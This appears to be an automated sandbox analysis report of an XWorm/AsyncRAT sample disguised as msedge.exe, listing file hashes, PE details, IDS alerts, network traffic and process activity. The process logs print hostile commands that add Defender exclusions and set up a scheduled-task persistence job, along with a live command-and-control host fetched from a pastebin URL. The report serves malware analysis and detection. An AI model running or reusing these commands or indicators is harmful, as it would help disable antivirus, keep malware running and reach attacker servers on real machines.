SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgdhokbz.iez.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_noamr3bp.gv2.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmfayu1g.j22.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vl3aajcv.fim.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y4cra1ji.nt1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\Runtime Broken Core.exe

Download File

Process:	C:\Program Files\msedge.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	360448
Entropy (8bit):	6.494192551510268
Encrypted:	false
SSDEEP:	3072:IuKB70VnOzZJ5ldNCNL2EHBAnpK37nXC8d009Q7I6Ps574tyJh+gKAZ6gUXnBppP:76J5f8/R6PeF6JgrGqStGEbxq
MD5:	0EA332E21336FF3E93E5713B6CF0A74F
SHA1:	307253C29CB74ADE88684F45B8FE10FC05BCF202
SHA-256:	3663D60F0C8125E46F3F4EFB108D21FEA6065F8C636E770D7EFB26E66C2529A9
SHA-512:	E734465CB281A4CBF2383E550D94B01E8459E24324977FD3C35A4D8D16BEAA2BCEE866639E55CF9828F6DE71588580DC796B8BF0DD92BB0DF6C54E22E80059CB
Malicious:	true
Yara Hits:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Users\user\AppData\Roaming\Runtime Broken Core.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 82%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Pg.................~..........z.... ........@.. ....................................@.................................,...L.......H............................................................................................ ..H............text....\|... ...~.................. ..`.rsrc...H...........................@..@.reloc...............~..............@..B................H...........N.............................................................(.....r...p.. .l.....(.....r...p.. ......s.........s.........s.........s............0..........~....o.....8............0..........~....o.....8............0..........~....o.....8............0..........~....o.....8............r-..p.. ......rC..p.. S.....rY..p.. ..?...ro..p.. ......r...p.. E/...jr...p(....r...p(............(....*.0-.........(....:.....(....~....~....r...p~....(.....(.....@p..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.494192551510268
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	file.exe
File size:	360'448 bytes
MD5:	0ea332e21336ff3e93e5713b6cf0a74f
SHA1:	307253c29cb74ade88684f45b8fe10fc05bcf202
SHA256:	3663d60f0c8125e46f3f4efb108d21fea6065f8c636e770d7efb26e66c2529a9
SHA512:	e734465cb281a4cbf2383e550d94b01e8459e24324977fd3c35a4d8d16beaa2bcee866639e55cf9828f6de71588580dc796b8bf0dd92bb0df6c54e22e80059cb
SSDEEP:	3072:IuKB70VnOzZJ5ldNCNL2EHBAnpK37nXC8d009Q7I6Ps574tyJh+gKAZ6gUXnBppP:76J5f8/R6PeF6JgrGqStGEbxq
TLSH:	40747D012BD8E86BE97D07B5E4B1535007BCFA4BA1A1DB8934DC2DBC675332099127AF
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Pg.................~..........z.... ........@.. ....................................@................................

File Icon


Icon Hash:	170105b232472f1f

Static PE Info

General

Entrypoint:	0x439c7a
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6750AFCE [Wed Dec 4 19:38:54 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00439C88h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
pop esp
pushfd
add eax, dword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x39c2c	0x4c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3a000	0x1fd48	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x39c88	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x37c90	0x37e00	6775327017c9fd2a1335e7ddf31fd6f6	False	0.4770824594519016	data	6.41256096364801	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x3a000	0x1fd48	0x1fe00	4edb0ca2d167940da9488bdcfdc775e5	False	0.4359375	data	6.172922891672305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5a000	0xc	0x200	d3f018188cfcb8c15cb823b281ee1c66	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x3a1a0	0x7198	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9990027510316368
RT_ICON	0x41348	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.21535253756062936
RT_ICON	0x51b80	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.3363249881908361
RT_ICON	0x55db8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.4050829875518672
RT_ICON	0x58370	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.5145403377110694
RT_ICON	0x59428	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.7411347517730497
RT_GROUP_ICON	0x598a0	0x5a	data	0.7333333333333333
RT_VERSION	0x5990a	0x244	data	0.4706896551724138
RT_MANIFEST	0x59b5e	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-13T17:58:39.261340+0100	2855924	ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound	1	192.168.2.7	49765	147.185.221.24	19999	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:58:22.883416891 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:22.883486032 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:22.883701086 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:22.893383980 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:22.893413067 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.111160040 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.111228943 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:24.114448071 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:24.114463091 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.114686012 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.157392025 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:24.174094915 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:24.215373993 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.926415920 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.926492929 CET	443	49756	172.67.19.24	192.168.2.7
Dec 13, 2024 17:58:24.927089930 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:24.933499098 CET	49756	443	192.168.2.7	172.67.19.24
Dec 13, 2024 17:58:25.321365118 CET	49765	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:25.441157103 CET	19999	49765	147.185.221.24	192.168.2.7
Dec 13, 2024 17:58:25.441262960 CET	49765	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:25.683454990 CET	49765	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:25.804944038 CET	19999	49765	147.185.221.24	192.168.2.7
Dec 13, 2024 17:58:39.261339903 CET	49765	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:39.381206036 CET	19999	49765	147.185.221.24	192.168.2.7
Dec 13, 2024 17:58:47.344523907 CET	19999	49765	147.185.221.24	192.168.2.7
Dec 13, 2024 17:58:47.344664097 CET	49765	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:50.392146111 CET	49765	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:50.393836021 CET	49821	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:50.511895895 CET	19999	49765	147.185.221.24	192.168.2.7
Dec 13, 2024 17:58:50.513797045 CET	19999	49821	147.185.221.24	192.168.2.7
Dec 13, 2024 17:58:50.513895035 CET	49821	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:50.556593895 CET	49821	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:58:50.679512978 CET	19999	49821	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:03.502005100 CET	49821	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:03.621752977 CET	19999	49821	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:12.422782898 CET	19999	49821	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:12.422848940 CET	49821	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:12.781167984 CET	49821	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:12.787563086 CET	49876	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:12.901021957 CET	19999	49821	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:12.907804012 CET	19999	49876	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:12.907897949 CET	49876	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:12.967411041 CET	49876	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:13.087321997 CET	19999	49876	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:26.940893888 CET	49876	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:27.062333107 CET	19999	49876	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:34.830086946 CET	19999	49876	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:34.831001043 CET	49876	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:37.785532951 CET	49876	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:37.788893938 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:37.905391932 CET	19999	49876	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:37.908792973 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:37.908881903 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:37.944143057 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:38.063966036 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:38.064053059 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:38.183892965 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:38.183989048 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:38.303879976 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:38.303965092 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:38.424084902 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:38.426202059 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:38.546056986 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:43.601298094 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:43.721446991 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:44.690074921 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:44.809987068 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:55.189493895 CET	49932	19999	192.168.2.7	147.185.221.24
Dec 13, 2024 17:59:55.309787035 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:59.815790892 CET	19999	49932	147.185.221.24	192.168.2.7
Dec 13, 2024 17:59:59.816401958 CET	49932	19999	192.168.2.7	147.185.221.24

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 17:58:22.716595888 CET	56401	53	192.168.2.7	1.1.1.1
Dec 13, 2024 17:58:22.853744030 CET	53	56401	1.1.1.1	192.168.2.7
Dec 13, 2024 17:58:25.055344105 CET	50929	53	192.168.2.7	1.1.1.1
Dec 13, 2024 17:58:25.319536924 CET	53	50929	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 17:58:22.716595888 CET	192.168.2.7	1.1.1.1	0xdff0	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:25.055344105 CET	192.168.2.7	1.1.1.1	0x12b1	Standard query (0)	flash-mathematical.gl.at.ply.gg	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 17:58:22.853744030 CET	1.1.1.1	192.168.2.7	0xdff0	No error (0)	pastebin.com	172.67.19.24	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:22.853744030 CET	1.1.1.1	192.168.2.7	0xdff0	No error (0)	pastebin.com	104.20.4.235	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:22.853744030 CET	1.1.1.1	192.168.2.7	0xdff0	No error (0)	pastebin.com	104.20.3.235	A (IP address)	IN (0x0001)	false
Dec 13, 2024 17:58:25.319536924 CET	1.1.1.1	192.168.2.7	0x12b1	No error (0)	flash-mathematical.gl.at.ply.gg	147.185.221.24	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49756	172.67.19.24	443	8072	C:\Program Files\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 16:58:24 UTC	74	OUT	GET /raw/BE5x0K3q HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-12-13 16:58:24 UTC	388	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 16:58:24 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Fri, 13 Dec 2024 16:58:24 GMT Server: cloudflare CF-RAY: 8f177fae6cdb0f84-EWR
2024-12-13 16:58:24 UTC	43	IN	Data Raw: 32 35 0d 0a 66 6c 61 73 68 2d 6d 61 74 68 65 6d 61 74 69 63 61 6c 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 31 39 39 39 39 0d 0a Data Ascii: 25flash-mathematical.gl.at.ply.gg:19999
2024-12-13 16:58:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	5
Start time:	11:57:48
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x280000
File size:	360'448 bytes
MD5 hash:	0EA332E21336FF3E93E5713B6CF0A74F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000002.1564147086.0000000012781000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000005.00000000.1275494470.0000000000282000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	11:57:49
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\msedge.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	11:57:49
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	11:57:57
Start date:	13/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
Imagebase:	0x7ff741d30000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	11:57:57
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:18:07
Start date:	13/12/2024
Path:	C:\Program Files\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\msedge.exe"
Imagebase:	0xad0000
File size:	360'448 bytes
MD5 hash:	0EA332E21336FF3E93E5713B6CF0A74F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Program Files\msedge.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 82%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:18:10
Start date:	13/12/2024
Path:	C:\Program Files\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\msedge.exe"
Imagebase:	0xd50000
File size:	360'448 bytes
MD5 hash:	0EA332E21336FF3E93E5713B6CF0A74F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2551372869.0000000001520000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000012.00000002.2552140840.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	13:18:14
Start date:	13/12/2024
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Runtime Broken Core" /tr "C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Imagebase:	0x7ff7e6aa0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:18:14
Start date:	13/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:18:15
Start date:	13/12/2024
Path:	C:\Users\user\AppData\Roaming\Runtime Broken Core.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Runtime Broken Core.exe"
Imagebase:	0xc70000
File size:	360'448 bytes
MD5 hash:	0EA332E21336FF3E93E5713B6CF0A74F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
